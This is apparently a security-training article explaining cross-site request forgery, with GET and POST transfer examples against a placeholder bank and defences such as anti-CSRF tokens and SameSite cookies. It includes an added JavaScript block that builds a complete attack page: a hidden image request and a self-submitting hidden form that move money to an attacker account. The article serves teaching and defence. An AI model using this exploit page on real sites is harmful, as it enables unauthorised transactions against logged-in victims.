Cross-Site Request Forgery (CSRF) Attack
Cross-Site Request Forgery (CSRF or XSRF) is an attack that forces an end user to execute unwanted actions in a web application in which they are currently authenticated. The key component of a CSRF attack is social engineering: the attacker has to get the victim's own browser to send the forged request, because that browser is what holds the victim's session. CSRF attacks can:
● Change the target's information in an application
● Make a transaction
● Change login details and passwords
● Purchase things using the victim's credentials
● Send information using the name of the victim
CSRF Attack Methodology
Attackers generally use social engineering, typically a link delivered by email, chat or social media, to carry out CSRF attacks. The victim is misled into clicking a URL (or visiting a page) that carries a maliciously crafted request for a specific web application in which the victim is currently logged in. When the victim follows the link, their browser sends that request to the target application and, as it does for any request to that site, automatically attaches the credentials it holds for it, such as the session cookie. The application cannot distinguish this request from one the user submitted deliberately, because it arrives with a valid session, so it performs the action. A CSRF attack therefore does not break authentication; it rides on the victim's existing authenticated session against applications that fail to verify that a state-changing request was intentionally issued by the user.
CSRF Attack Example
Attackers can trick users into entering or loading information into a web application in several ways, but the attack always has two steps:
● The attacker crafts an exploit URL, or a piece of HTML or JavaScript, that issues the forged request.
● The attacker tricks the victim into triggering it, so that the intended action is carried out with the victim's session.
Before attacking, the attacker studies the application so that the forged request is indistinguishable from a genuine one: same endpoint, same parameters, same HTTP method.
- Using a GET request
For example, a normal GET request for a $150 bank transfer might look like this:
GET http://netbank.com/transfer.do?acct=personA&amount=$150 HTTP/1.1
The attacker rewrites the request so that the $150 goes to an account they control, and then gets the victim's browser to issue it, for example through a link the victim is tricked into clicking or an image tag on a page the victim visits:
GET http://netbank.com/transfer.do?acct=attackersB&amount=$150 HTTP/1.1
Because the browser attaches the victim's netbank.com session cookie to this request automatically, the bank processes it as the victim's own.
- Using a POST request
When the attack uses a POST request, the procedure is very similar to the GET case, except that the request cannot be carried by a bare URL: the victim's browser has to be made to submit it. For example, the attacker hosts a page containing a form whose fields are pre-filled with the transfer parameters and hidden from view. When the victim clicks inside the page (or simply loads it, if the form submits itself via script), the POST request is sent to the bank with the victim's cookies attached.
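The page below, as an added example that is not part of the original article, shows how the two forged transfer requests above are delivered. The endpoint, account names and amount are the article's placeholders; the attacker-controlled page that hosts this markup is assumed to live on some site the victim is lured to, and the victim is assumed to be logged in to netbank.com in the same browser.

```javascript
// Added example (not from the original article): how the two forged
// transfer requests are delivered to the victim's browser. The endpoint,
// account names and amount are the article's placeholders; the attacker-
// controlled page that hosts this markup is assumed to be on a site the
// victim is lured to, and the victim is assumed to be logged in to netbank.com.
const TARGET = "http://netbank.com/transfer.do";

// Builds the URL for the GET variant. The article writes "$150" literally;
// a real URL carries it percent-encoded, which URLSearchParams does here.
function forgedGetUrl(account, amount) {
  const q = new URLSearchParams({ acct: account, amount: amount });
  return `${TARGET}?${q.toString()}`;
}

// GET variant: an image tag. The browser requests the src URL with the
// victim's netbank.com cookies attached; the response never needs to be a
// valid image, and a 1x1 tag is invisible on the attacker's page.
function buildGetExploit(account, amount) {
  return `<img src="${forgedGetUrl(account, amount)}" width="1" height="1" alt="">`;
}

// POST variant: a form pre-filled with the transfer parameters. The fields
// are hidden and the form submits itself on load, so the victim only has to
// open the page; a visible button works as well, with the victim "clicking
// inside the page" as the article describes.
function buildPostExploit(account, amount) {
  return [
    `<form id="xfer" action="${TARGET}" method="POST">`,
    `  <input type="hidden" name="acct" value="${account}">`,
    `  <input type="hidden" name="amount" value="${amount}">`,
    `</form>`,
    `<script>document.getElementById("xfer").submit();</script>`,
  ].join("\n");
}

// Assembles the page the victim is lured to; either payload alone suffices.
function buildAttackerPage(account, amount) {
  return [
    "<!doctype html>",
    "<html><body>",
    buildGetExploit(account, amount),
    buildPostExploit(account, amount),
    "</body></html>",
  ].join("\n");
}

// Usage: the page that moves $150 into the attacker's account "attackersB".
const attackerPage = buildAttackerPage("attackersB", "150");
```

Neither payload needs the victim to type anything: the image request fires as soon as the page renders, and the script submits the form immediately afterwards. This is why the defences have to live in the application and not in the user's vigilance.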
Preventing CSRF Attacks
There are several techniques for preventing and mitigating CSRF attacks. Some are habits on the user's side that shrink the window of exposure:
● Log out of web applications when you are not using them, so that no authenticated session exists for an attacker to ride on.
● Keep usernames and passwords secure.
● Do not let the browser save passwords for sensitive sites.
● Avoid browsing other sites in parallel while logged in to a sensitive application.
The measures that actually close the hole, however, are implemented by the application:
● Use an anti-CSRF token: a secret, unpredictable value tied to the user's session that the server embeds in every form and verifies on every state-changing request. A page on the attacker's site cannot read the token, so the forged request fails the check.
● Use the SameSite cookie flag: with SameSite=Strict or SameSite=Lax, the browser does not attach the session cookie to requests initiated from another site, so the forged request arrives unauthenticated. Note that Lax still sends the cookie on top-level GET navigations such as a clicked link, so state-changing actions like the transfer above must never be performed via GET.
How can InfosecTrain Help You?
If you are a cybersecurity professional looking to acquire the skills to prevent CSRF attacks, enroll in InfosecTrain’s Web Application Penetration Testing online training course. It will help you gain the knowledge, tools, and strategies required to execute comprehensive web application security tests.